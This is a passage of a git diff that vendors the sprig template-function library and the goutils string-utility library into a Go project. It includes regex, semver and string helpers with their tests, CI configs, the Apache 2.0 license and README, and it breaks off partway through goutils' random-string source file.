\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/regex_test.go b/vendor/github.com/Masterminds/sprig/regex_test.go
new file mode 100644
index 0000000000..ccb87fe2f5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex_test.go
@@ -0,0 +1,61 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestRegexMatch(t *testing.T) {
+ regex := "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}"
+
+ assert.True(t, regexMatch(regex, "test@acme.com"))
+ assert.True(t, regexMatch(regex, "Test@Acme.Com"))
+ assert.False(t, regexMatch(regex, "test"))
+ assert.False(t, regexMatch(regex, "test.com"))
+ assert.False(t, regexMatch(regex, "test@acme"))
+}
+
+func TestRegexFindAll(t *testing.T){
+ regex := "a{2}"
+ assert.Equal(t, 1, len(regexFindAll(regex, "aa", -1)))
+ assert.Equal(t, 1, len(regexFindAll(regex, "aaaaaaaa", 1)))
+ assert.Equal(t, 2, len(regexFindAll(regex, "aaaa", -1)))
+ assert.Equal(t, 0, len(regexFindAll(regex, "none", -1)))
+}
+
+func TestRegexFindl(t *testing.T){
+ regex := "fo.?"
+ assert.Equal(t, "foo", regexFind(regex, "foorbar"))
+ assert.Equal(t, "foo", regexFind(regex, "foo foe fome"))
+ assert.Equal(t, "", regexFind(regex, "none"))
+}
+
+func TestRegexReplaceAll(t *testing.T){
+ regex := "a(x*)b"
+ assert.Equal(t, "-T-T-", regexReplaceAll(regex,"-ab-axxb-", "T"))
+ assert.Equal(t, "--xx-", regexReplaceAll(regex,"-ab-axxb-", "$1"))
+ assert.Equal(t, "---", regexReplaceAll(regex,"-ab-axxb-", "$1W"))
+ assert.Equal(t, "-W-xxW-", regexReplaceAll(regex,"-ab-axxb-", "${1}W"))
+}
+
+func TestRegexReplaceAllLiteral(t *testing.T){
+ regex := "a(x*)b"
+ assert.Equal(t, "-T-T-", regexReplaceAllLiteral(regex,"-ab-axxb-", "T"))
+ assert.Equal(t, "-$1-$1-", regexReplaceAllLiteral(regex,"-ab-axxb-", "$1"))
+ assert.Equal(t, "-${1}-${1}-", regexReplaceAllLiteral(regex,"-ab-axxb-", "${1}"))
+}
+
+func TestRegexSplit(t *testing.T){
+ regex := "a"
+ assert.Equal(t, 4, len(regexSplit(regex,"banana", -1)))
+ assert.Equal(t, 0, len(regexSplit(regex,"banana", 0)))
+ assert.Equal(t, 1, len(regexSplit(regex,"banana", 1)))
+ assert.Equal(t, 2, len(regexSplit(regex,"banana", 2)))
+
+ regex = "z+"
+ assert.Equal(t, 2, len(regexSplit(regex,"pizza", -1)))
+ assert.Equal(t, 0, len(regexSplit(regex,"pizza", 0)))
+ assert.Equal(t, 1, len(regexSplit(regex,"pizza", 1)))
+ assert.Equal(t, 2, len(regexSplit(regex,"pizza", 2)))
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/semver.go b/vendor/github.com/Masterminds/sprig/semver.go
new file mode 100644
index 0000000000..c2bf8a1fdf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver.go
@@ -0,0 +1,23 @@
+package sprig
+
+import (
+ sv2 "github.com/Masterminds/semver"
+)
+
+func semverCompare(constraint, version string) (bool, error) {
+ c, err := sv2.NewConstraint(constraint)
+ if err != nil {
+ return false, err
+ }
+
+ v, err := sv2.NewVersion(version)
+ if err != nil {
+ return false, err
+ }
+
+ return c.Check(v), nil
+}
+
+func semver(version string) (*sv2.Version, error) {
+ return sv2.NewVersion(version)
+}
diff --git a/vendor/github.com/Masterminds/sprig/semver_test.go b/vendor/github.com/Masterminds/sprig/semver_test.go
new file mode 100644
index 0000000000..53d3c8be9b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver_test.go
@@ -0,0 +1,31 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestSemverCompare(t *testing.T) {
+ tests := map[string]string{
+ `{{ semverCompare "1.2.3" "1.2.3" }}`: `true`,
+ `{{ semverCompare "^1.2.0" "1.2.3" }}`: `true`,
+ `{{ semverCompare "^1.2.0" "2.2.3" }}`: `false`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestSemver(t *testing.T) {
+ tests := map[string]string{
+ `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Prerelease }}`: "beta.1",
+ `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Major}}`: "1",
+ `{{ semver "1.2.3" | (semver "1.2.3").Compare }}`: `0`,
+ `{{ semver "1.2.3" | (semver "1.3.3").Compare }}`: `1`,
+ `{{ semver "1.4.3" | (semver "1.2.3").Compare }}`: `-1`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings.go b/vendor/github.com/Masterminds/sprig/strings.go
new file mode 100644
index 0000000000..f6afa2ff9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings.go
@@ -0,0 +1,201 @@
+package sprig
+
+import (
+ "encoding/base32"
+ "encoding/base64"
+ "fmt"
+ "reflect"
+ "strconv"
+ "strings"
+
+ util "github.com/aokoli/goutils"
+)
+
+func base64encode(v string) string {
+ return base64.StdEncoding.EncodeToString([]byte(v))
+}
+
+func base64decode(v string) string {
+ data, err := base64.StdEncoding.DecodeString(v)
+ if err != nil {
+ return err.Error()
+ }
+ return string(data)
+}
+
+func base32encode(v string) string {
+ return base32.StdEncoding.EncodeToString([]byte(v))
+}
+
+func base32decode(v string) string {
+ data, err := base32.StdEncoding.DecodeString(v)
+ if err != nil {
+ return err.Error()
+ }
+ return string(data)
+}
+
+func abbrev(width int, s string) string {
+ if width < 4 {
+ return s
+ }
+ r, _ := util.Abbreviate(s, width)
+ return r
+}
+
+func abbrevboth(left, right int, s string) string {
+ if right < 4 || left > 0 && right < 7 {
+ return s
+ }
+ r, _ := util.AbbreviateFull(s, left, right)
+ return r
+}
+func initials(s string) string {
+ // Wrap this just to eliminate the var args, which templates don't do well.
+ return util.Initials(s)
+}
+
+func randAlphaNumeric(count int) string {
+ // It is not possible, it appears, to actually generate an error here.
+ r, _ := util.RandomAlphaNumeric(count)
+ return r
+}
+
+func randAlpha(count int) string {
+ r, _ := util.RandomAlphabetic(count)
+ return r
+}
+
+func randAscii(count int) string {
+ r, _ := util.RandomAscii(count)
+ return r
+}
+
+func randNumeric(count int) string {
+ r, _ := util.RandomNumeric(count)
+ return r
+}
+
+func untitle(str string) string {
+ return util.Uncapitalize(str)
+}
+
+func quote(str ...interface{}) string {
+ out := make([]string, len(str))
+ for i, s := range str {
+ out[i] = fmt.Sprintf("%q", strval(s))
+ }
+ return strings.Join(out, " ")
+}
+
+func squote(str ...interface{}) string {
+ out := make([]string, len(str))
+ for i, s := range str {
+ out[i] = fmt.Sprintf("'%v'", s)
+ }
+ return strings.Join(out, " ")
+}
+
+func cat(v ...interface{}) string {
+ r := strings.TrimSpace(strings.Repeat("%v ", len(v)))
+ return fmt.Sprintf(r, v...)
+}
+
+func indent(spaces int, v string) string {
+ pad := strings.Repeat(" ", spaces)
+ return pad + strings.Replace(v, "\n", "\n"+pad, -1)
+}
+
+func nindent(spaces int, v string) string {
+ return "\n" + indent(spaces, v)
+}
+
+func replace(old, new, src string) string {
+ return strings.Replace(src, old, new, -1)
+}
+
+func plural(one, many string, count int) string {
+ if count == 1 {
+ return one
+ }
+ return many
+}
+
+func strslice(v interface{}) []string {
+ switch v := v.(type) {
+ case []string:
+ return v
+ case []interface{}:
+ l := len(v)
+ b := make([]string, l)
+ for i := 0; i < l; i++ {
+ b[i] = strval(v[i])
+ }
+ return b
+ default:
+ val := reflect.ValueOf(v)
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+ l := val.Len()
+ b := make([]string, l)
+ for i := 0; i < l; i++ {
+ b[i] = strval(val.Index(i).Interface())
+ }
+ return b
+ default:
+ return []string{strval(v)}
+ }
+ }
+}
+
+func strval(v interface{}) string {
+ switch v := v.(type) {
+ case string:
+ return v
+ case []byte:
+ return string(v)
+ case error:
+ return v.Error()
+ case fmt.Stringer:
+ return v.String()
+ default:
+ return fmt.Sprintf("%v", v)
+ }
+}
+
+func trunc(c int, s string) string {
+ if len(s) <= c {
+ return s
+ }
+ return s[0:c]
+}
+
+func join(sep string, v interface{}) string {
+ return strings.Join(strslice(v), sep)
+}
+
+func split(sep, orig string) map[string]string {
+ parts := strings.Split(orig, sep)
+ res := make(map[string]string, len(parts))
+ for i, v := range parts {
+ res["_"+strconv.Itoa(i)] = v
+ }
+ return res
+}
+
+// substring creates a substring of the given string.
+//
+// If start is < 0, this calls string[:length].
+//
+// If start is >= 0 and length < 0, this calls string[start:]
+//
+// Otherwise, this calls string[start, length].
+func substring(start, length int, s string) string {
+ if start < 0 {
+ return s[:length]
+ }
+ if length < 0 {
+ return s[start:]
+ }
+ return s[start:length]
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings_test.go b/vendor/github.com/Masterminds/sprig/strings_test.go
new file mode 100644
index 0000000000..79bfcf5483
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings_test.go
@@ -0,0 +1,227 @@
+package sprig
+
+import (
+ "encoding/base32"
+ "encoding/base64"
+ "fmt"
+ "math/rand"
+ "testing"
+
+ "github.com/aokoli/goutils"
+ "github.com/stretchr/testify/assert"
+)
+
+func TestSubstr(t *testing.T) {
+ tpl := `{{"fooo" | substr 0 3 }}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTrunc(t *testing.T) {
+ tpl := `{{ "foooooo" | trunc 3 }}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestQuote(t *testing.T) {
+ tpl := `{{quote "a" "b" "c"}}`
+ if err := runt(tpl, `"a" "b" "c"`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{quote "\"a\"" "b" "c"}}`
+ if err := runt(tpl, `"\"a\"" "b" "c"`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{quote 1 2 3 }}`
+ if err := runt(tpl, `"1" "2" "3"`); err != nil {
+ t.Error(err)
+ }
+}
+func TestSquote(t *testing.T) {
+ tpl := `{{squote "a" "b" "c"}}`
+ if err := runt(tpl, `'a' 'b' 'c'`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{squote 1 2 3 }}`
+ if err := runt(tpl, `'1' '2' '3'`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestContains(t *testing.T) {
+ // Mainly, we're just verifying the paramater order swap.
+ tests := []string{
+ `{{if contains "cat" "fair catch"}}1{{end}}`,
+ `{{if hasPrefix "cat" "catch"}}1{{end}}`,
+ `{{if hasSuffix "cat" "ducat"}}1{{end}}`,
+ }
+ for _, tt := range tests {
+ if err := runt(tt, "1"); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestTrim(t *testing.T) {
+ tests := []string{
+ `{{trim " 5.00 "}}`,
+ `{{trimAll "$" "$5.00$"}}`,
+ `{{trimPrefix "$" "$5.00"}}`,
+ `{{trimSuffix "$" "5.00$"}}`,
+ }
+ for _, tt := range tests {
+ if err := runt(tt, "5.00"); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestSplit(t *testing.T) {
+ tpl := `{{$v := "foo$bar$baz" | split "$"}}{{$v._0}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToString(t *testing.T) {
+ tpl := `{{ toString 1 | kindOf }}`
+ assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestToStrings(t *testing.T) {
+ tpl := `{{ $s := list 1 2 3 | toStrings }}{{ index $s 1 | kindOf }}`
+ assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestJoin(t *testing.T) {
+ assert.NoError(t, runt(`{{ tuple "a" "b" "c" | join "-" }}`, "a-b-c"))
+ assert.NoError(t, runt(`{{ tuple 1 2 3 | join "-" }}`, "1-2-3"))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "a-b-c", map[string]interface{}{"V": []string{"a", "b", "c"}}))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "abc", map[string]interface{}{"V": "abc"}))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "1-2-3", map[string]interface{}{"V": []int{1, 2, 3}}))
+}
+
+func TestSortAlpha(t *testing.T) {
+ // Named `append` in the function map
+ tests := map[string]string{
+ `{{ list "c" "a" "b" | sortAlpha | join "" }}`: "abc",
+ `{{ list 2 1 4 3 | sortAlpha | join "" }}`: "1234",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestBase64EncodeDecode(t *testing.T) {
+ magicWord := "coffee"
+ expect := base64.StdEncoding.EncodeToString([]byte(magicWord))
+
+ if expect == magicWord {
+ t.Fatal("Encoder doesn't work.")
+ }
+
+ tpl := `{{b64enc "coffee"}}`
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ tpl = fmt.Sprintf("{{b64dec %q}}", expect)
+ if err := runt(tpl, magicWord); err != nil {
+ t.Error(err)
+ }
+}
+func TestBase32EncodeDecode(t *testing.T) {
+ magicWord := "coffee"
+ expect := base32.StdEncoding.EncodeToString([]byte(magicWord))
+
+ if expect == magicWord {
+ t.Fatal("Encoder doesn't work.")
+ }
+
+ tpl := `{{b32enc "coffee"}}`
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ tpl = fmt.Sprintf("{{b32dec %q}}", expect)
+ if err := runt(tpl, magicWord); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestGoutils(t *testing.T) {
+ tests := map[string]string{
+ `{{abbrev 5 "hello world"}}`: "he...",
+ `{{abbrevboth 5 10 "1234 5678 9123"}}`: "...5678...",
+ `{{nospace "h e l l o "}}`: "hello",
+ `{{untitle "First Try"}}`: "first try", //https://youtu.be/44-RsrF_V_w
+ `{{initials "First Try"}}`: "FT",
+ `{{wrap 5 "Hello World"}}`: "Hello\nWorld",
+ `{{wrapWith 5 "\t" "Hello World"}}`: "Hello\tWorld",
+ }
+ for k, v := range tests {
+ t.Log(k)
+ if err := runt(k, v); err != nil {
+ t.Errorf("Error on tpl %q: %s", k, err)
+ }
+ }
+}
+
+func TestRandom(t *testing.T) {
+ // One of the things I love about Go:
+ goutils.RANDOM = rand.New(rand.NewSource(1))
+
+ // Because we're using a random number generator, we need these to go in
+ // a predictable sequence:
+ if err := runt(`{{randAlphaNum 5}}`, "9bzRv"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randAlpha 5}}`, "VjwGe"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randAscii 5}}`, "1KA5p"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randNumeric 5}}`, "26018"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+
+}
+
+func TestCat(t *testing.T) {
+ tpl := `{{$b := "b"}}{{"c" | cat "a" $b}}`
+ if err := runt(tpl, "a b c"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestIndent(t *testing.T) {
+ tpl := `{{indent 4 "a\nb\nc"}}`
+ if err := runt(tpl, " a\n b\n c"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestNindent(t *testing.T) {
+ tpl := `{{nindent 4 "a\nb\nc"}}`
+ if err := runt(tpl, "\n a\n b\n c"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestReplace(t *testing.T) {
+ tpl := `{{"I Am Henry VIII" | replace " " "-"}}`
+ if err := runt(tpl, "I-Am-Henry-VIII"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPlural(t *testing.T) {
+ tpl := `{{$num := len "two"}}{{$num}} {{$num | plural "1 char" "chars"}}`
+ if err := runt(tpl, "3 chars"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{len "t" | plural "cheese" "%d chars"}}`
+ if err := runt(tpl, "cheese"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/aokoli/goutils/.travis.yml b/vendor/github.com/aokoli/goutils/.travis.yml
new file mode 100644
index 0000000000..4025e01ec4
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/.travis.yml
@@ -0,0 +1,18 @@
+language: go
+
+go:
+ - 1.6
+ - 1.7
+ - 1.8
+ - tip
+
+script:
+ - go test -v
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/aokoli/goutils/CHANGELOG.md b/vendor/github.com/aokoli/goutils/CHANGELOG.md
new file mode 100644
index 0000000000..d700ec47f2
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/CHANGELOG.md
@@ -0,0 +1,8 @@
+# 1.0.1 (2017-05-31)
+
+## Fixed
+- #21: Fix generation of alphanumeric strings (thanks @dbarranco)
+
+# 1.0.0 (2014-04-30)
+
+- Initial release.
diff --git a/vendor/github.com/aokoli/goutils/LICENSE.txt b/vendor/github.com/aokoli/goutils/LICENSE.txt
new file mode 100644
index 0000000000..d645695673
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/LICENSE.txt
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/vendor/github.com/aokoli/goutils/README.md b/vendor/github.com/aokoli/goutils/README.md
new file mode 100644
index 0000000000..163ffe72a8
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/README.md
@@ -0,0 +1,70 @@
+GoUtils
+===========
+[![Stability: Maintenance](https://masterminds.github.io/stability/maintenance.svg)](https://masterminds.github.io/stability/maintenance.html)
+[![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) [![Build Status](https://travis-ci.org/Masterminds/goutils.svg?branch=master)](https://travis-ci.org/Masterminds/goutils) [![Build status](https://ci.appveyor.com/api/projects/status/sc2b1ew0m7f0aiju?svg=true)](https://ci.appveyor.com/project/mattfarina/goutils)
+
+
+GoUtils provides users with utility functions to manipulate strings in various ways. It is a Go implementation of some
+string manipulation libraries of Java Apache Commons. GoUtils includes the following Java Apache Commons classes:
+* WordUtils
+* RandomStringUtils
+* StringUtils (partial implementation)
+
+## Installation
+If you have Go set up on your system, from the GOPATH directory within the command line/terminal, enter this:
+
+ go get github.com/Masterminds/goutils
+
+If you do not have Go set up on your system, please follow the [Go installation directions from the documenation](http://golang.org/doc/install), and then follow the instructions above to install GoUtils.
+
+
+## Documentation
+GoUtils doc is available here: [![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils)
+
+
+## Usage
+The code snippets below show examples of how to use GoUtils. Some functions return errors while others do not. The first instance below, which does not return an error, is the `Initials` function (located within the `wordutils.go` file).
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/Masterminds/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 1: A goutils function which returns no errors
+ fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+ }
+Some functions return errors mainly due to illegal arguements used as parameters. The code example below illustrates how to deal with function that returns an error. In this instance, the function is the `Random` function (located within the `randomstringutils.go` file).
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/Masterminds/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 2: A goutils function which returns an error
+ rand1, err1 := goutils.Random (-1, 0, 0, true, true)
+
+ if err1 != nil {
+ fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+ } else {
+ fmt.Println(rand1)
+ }
+
+ }
+
+## License
+GoUtils is licensed under the Apache License, Version 2.0. Please check the LICENSE.txt file or visit http://www.apache.org/licenses/LICENSE-2.0 for a copy of the license.
+
+## Issue Reporting
+Make suggestions or report issues using the Git issue tracker: https://github.com/Masterminds/goutils/issues
+
+## Website
+* [GoUtils webpage](http://Masterminds.github.io/goutils/)
diff --git a/vendor/github.com/aokoli/goutils/appveyor.yml b/vendor/github.com/aokoli/goutils/appveyor.yml
new file mode 100644
index 0000000000..657564a847
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/appveyor.yml
@@ -0,0 +1,21 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\goutils
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+build: off
+
+install:
+ - go version
+ - go env
+
+test_script:
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils.go b/vendor/github.com/aokoli/goutils/randomstringutils.go
new file mode 100644
index 0000000000..1364e0cafd
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils.go
@@ -0,0 +1,268 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+ "fmt"
+ "math"
+ "math/rand"
+ "regexp"
+ "time"
+ "unicode"
+)
+
+// RANDOM provides the time-based seed used to generate random numbers
+var RANDOM = rand.New(rand.NewSource(time.Now().UnixNano()))
+
+/*
+RandomNonAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of all characters (ASCII/Unicode values between 0 to 2,147,483,647 (math.MaxInt32)).
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNonAlphaNumeric(count int) (string, error) {
+ return RandomAlphaNumericCustom(count, false, false)
+}
+
+/*
+RandomAscii creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of characters whose ASCII value is between 32 and 126 (inclusive).
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
